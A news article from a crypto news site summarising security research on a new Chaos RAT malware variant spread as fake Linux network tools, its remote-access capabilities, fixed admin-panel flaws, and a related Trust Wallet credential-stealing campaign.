New Chaos RAT Variant Targets Linux, Spreads via Fake Utilities

Chaos RAT Malware Targets Windows and Linux with Fake Network Tools and Cryptocurrency-Themed Attacks

  • A new version of Chaos RAT Malware is targeting both Windows and Linux systems.
  • The malware is spread through fake network tools and phishing emails, often disguised as Linux troubleshooting utilities.
  • Chaos RAT gives attackers remote access, file management, and control over infected devices.
  • Recent campaigns show connections with cryptocurrency mining activities and theft of wallet credentials.
  • Security flaws in the malware’s admin panel have been fixed as of May 2024.

A recent wave of cyber attacks is deploying an updated variant of the malware known as Chaos RAT, impacting both Windows and Linux operating systems. Researchers have found that attackers use deceptive network utility downloads and phishing emails to distribute the malware, particularly targeting Linux users.

- Advertisement -

Experts from Acronis revealed that Chaos RAT is an open-source remote access tool written in Go, supporting cross-platform deployment. Attackers often trick victims into downloading files disguised as helpful network tools, which in reality install the malware. Once on a system, Chaos RAT connects to an external server, enabling functions like launching remote command shells, managing files, collecting system information, and even shutting down or restarting machines. The latest observed version is 5.0.3, released May 31, 2024.

The Acronis research team stated, “Chaos RAT provides an administrative panel where users can build payloads, establish sessions, and control compromised machines.” They reported that Chaos RAT is used in cryptocurrency mining campaigns, with attacks distributing the malware through phishing links or attachments, and achieving persistence by modifying scheduled task files (such as “/etc/crontab” in Linux). The initial campaigns delivered both Chaos RAT and a separate cryptocurrency miner, showing that Chaos RAT was also used for gathering information about devices.

A with a sample uploaded to VirusTotal in January 2025 from India—titled “NetworkAnalyzer.tar.gz”—suggests attackers are disguising the malware as Linux troubleshooting tools to fool users. The management panel of Chaos RAT previously contained a high-severity vulnerability (CVE-2024-30850) that allowed command injection, as well as a cross-site scripting flaw (CVE-2024-31839). Both issues have now been fixed by the tool’s maintainer.

Researchers highlight that malicious actors use open-source malware like Chaos RAT because it can be quickly customized and makes it harder to determine who is behind attacks. They note that “using publicly available malware helps APT groups blend into the noise of everyday cybercrime,” complicating attribution attempts.

There is also evidence of ongoing campaigns attacking Trust Wallet users on desktop with fake wallets. These attacks are designed to collect browser credentials, extract data from crypto wallets, execute remote commands, and act as clipboard hijackers to steal sensitive information such as seed phrases and private keys. Details about this campaign were shared by Point Wild researcher Kedar S Pandit in a new report, noting the malware can monitor files, clipboard activity, and browser sessions to capture crypto asset details.

✅ Follow BITNEWSBOT on Telegram, Facebook, LinkedIn, X.com, and Google News for instant updates.

Previous Articles:

- Advertisement -

Latest

Dogecoin Millionaire Swaps ETH for PEPE, Becomes Meme Coin Mogul

Glauber Contessoto, known for his past Dogecoin investment, now holds about $1.1 million in Pepe coin.He sold all his Ethereum holdings in early 2024...

Sonic Labs Raises $10M, Expands US, Reveals Summit Singapore

Sonic Labs raised $10 million from Galaxy to support U.S. expansion and its DeFi ecosystem.GSR became an official market maker for Sonic, enhancing liquidity...

China to Sell Seized Crypto via Licensed Hong Kong Exchanges

China will sell seized cryptocurrency through licensed exchanges in Hong Kong for the first time.The initiative uses the China Beijing Equity Exchange (CBEX) and...

Game Data Becomes New Gold Rush for AI and Web3 Innovation in 2025

Structured gameplay data offers precise insights into risk, decision-making, and cooperation.Global gaming generates over $177 billion annually, supported by a player base exceeding 3.4...

Bitcoin Struggles Despite Record Highs, $37T ‘Time Bomb’ Looms

Bitcoin reached a new all-time high in May but has been unable to maintain momentum in the face of economic uncertainty.Concerns over a possible...

Must Read

The Ultimate Guide on How to Understand a Cryptocurrency White Paper

Today, cryptocurrency is a popular buzzword. We hear about it on the news, we read about it on the Internet. Yet, people are reluctant to...